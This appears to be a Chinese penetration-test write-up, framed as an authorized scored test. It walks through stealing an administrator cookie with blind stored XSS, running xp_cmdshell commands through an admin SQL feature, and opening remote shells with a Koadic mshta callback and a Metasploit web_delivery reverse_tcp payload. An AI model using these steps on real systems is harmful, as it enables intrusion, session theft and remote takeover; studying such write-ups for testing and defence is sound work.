服務器權限滲透測試實例分析

本文小編為大家詳細介紹“服務器權限滲透測試實例分析”，內容詳細，步驟清晰，細節處理妥當，希望這篇“服務器權限滲透測試實例分析”文章能幫助大家解決疑惑，下面跟著小編的思路慢慢深入，一起來學習新知識吧。

XSS

說起XSS，很多測試人員往往只輸入一些簡單的payload讓其彈窗證明即可（之前我也是這么干的）但通過這篇文章，可能以后不會再讓我們僅僅彈個窗證明其XSS漏洞存在；

Google語法

尋找入手點
滲透的思路是首先進行信息搜集，但這次測試的只有getshell或者拿到服務器的權限才給分數，像一般的XSS，csrf、弱口令是不算的即便是拿到后臺但是沒有getshell的話也是不算的。

在這種情況下一般我是尋找上傳點，通過Google語法搜索，site:子域名+intitle:注冊/登錄/系統來尋找可以注冊或者登錄的地方。

注冊成功后發現個人信息處存在XSS漏洞，平常測試都是讓其彈窗證明一下即可，沒有想通過XSS來做一些事情。

因為該處有身份證上傳功能，我首先對上傳點進行繞過，但是試了各種方法后發現沒有成功，故放棄該上傳點，開始仔細審查這個網站，發現此處提交個人信息保存后要管理員審核，而又存在存儲型XSS，那為什么不碰碰運氣打一下管理員的cookie呢。

于是在此處插入XSSpayload之后就出去吃飯靜等結果。

沒想到今天臉確實挺白的，吃飯時發現XSS打到管理員cookie信息的郵箱已經彈到了我的手機上，顧不上吃飯立馬回去打開電腦繼續搞。

XSS盲打后臺

訪問之后通過chrome上的EditThisCookie插件替換cookie成功以管理員的身份進入后臺，但發現進入的頁面是一個類似于靜態的頁面，只能看到里面的一些信息，其他什么功能都沒有：

心想，不應該啊，既然管理員要審核我的用戶信息，肯定是要有審核的那個接口，這時就想到了瀏覽器的同源策略

瀏覽器的同源策略

同源的定義：如果兩個頁面的協議，端口和主機都相同，則兩個頁面具有相同的源。

Cookie：只有同源的網頁才能共享，但是若兩個頁面一級域名相同，只是二級域名不同，那么瀏覽器可以通過設置document.domain來共享Cookie。

同源策略

果然可行，通過同源策略，我們成功的進入了管理員的后臺。

進入后臺第一件事：找上傳點！同樣無果，只能看看有沒有其他的突破口。終于在內容管理處找到了一個可以執行sql語句的地方。

既然可以執行SQL語句，那肯定少不了我們的常用命令xp_cmdshell，通過命令exec master..xp_cmdshell 'powershell whoami'命令成功執行，得知該服務器權限為system權限。

接下來的任務就是反彈shell到我們的MSF上了。但發現powershell反彈shell怎么彈都彈不回來，但走到這一步總不能放棄吧，畢竟我是想進入他們內網拉屎的男人。

這時問了公司大佬，大佬說可以用koadic試一試。

koadic的使用

   之前發現社區里面并沒有對koadic的介紹，我這里簡單的提兩句吧。
Koadic是發布于DEFCON上的一個后滲透工具，它和msf相似，但是Koadic主要是通過使用Windows ScriptHost（也稱為JScript / VBScript）進行大部分的操作，其核心兼容性支持Windows2000到Window 10的環境中使用，Koadic也試圖兼容Python 2和Python 3。

設置IP和端口，進行本地監聽。

koadic生成的mshta http://ip/XXXX 通過xp_cmdshell成功執行命令反彈到koadic上。

監聽成功：

cmdshell 0 -->進入cmd命令模式

這里其實使用koadic也可以進行后續操作，如提權、抓密碼等，但確實是不太熟悉koadic的一些功能，所以這里我們還是選擇使用我們最熟悉的MSF這款神器吧。（吹爆MSF！！-。-）

koadic轉shell到MSF

既然在koadic可以執行CMD命令，接下來我們只需要把shell轉到msf上即可；

打開MSF :msfconsole
使用web_delivery模塊
use exploit/multi/script/web_delivery
設置payload：
set payload windows/x64/meterpreter/reverse_tcp_rc4
set SRVPORT 8081
set lhost XX.XX.XX.XXX

因為之前已經通過koadic監聽到，而koadic和MSF都搭在我的服務器上，我們可以將其設置為攻擊者的內網IP地址。

查看內網ip：

set reverselistenerbindaddress 172.xx.xx.182

run
生成一個powershell.exe

在koadic執行exe之后成功將shell轉移到我們的MSF上

成功接收到sessions

看到熟悉的meterpreter模塊真的是老淚縱橫啊！！！

因為該服務器的權限直接是system權限，無需提權，正當我想繼續內網的主機各種橫向各種沖沖沖的的時候發現了一個重要的問題：沒有域！！！

讀到這里，這篇“服務器權限滲透測試實例分析”文章已經介紹完畢，想要掌握這篇文章的知識點還需要大家自己動手實踐使用過才能領會，如果想了解更多相關內容的文章，歡迎關注億速云行業資訊頻道。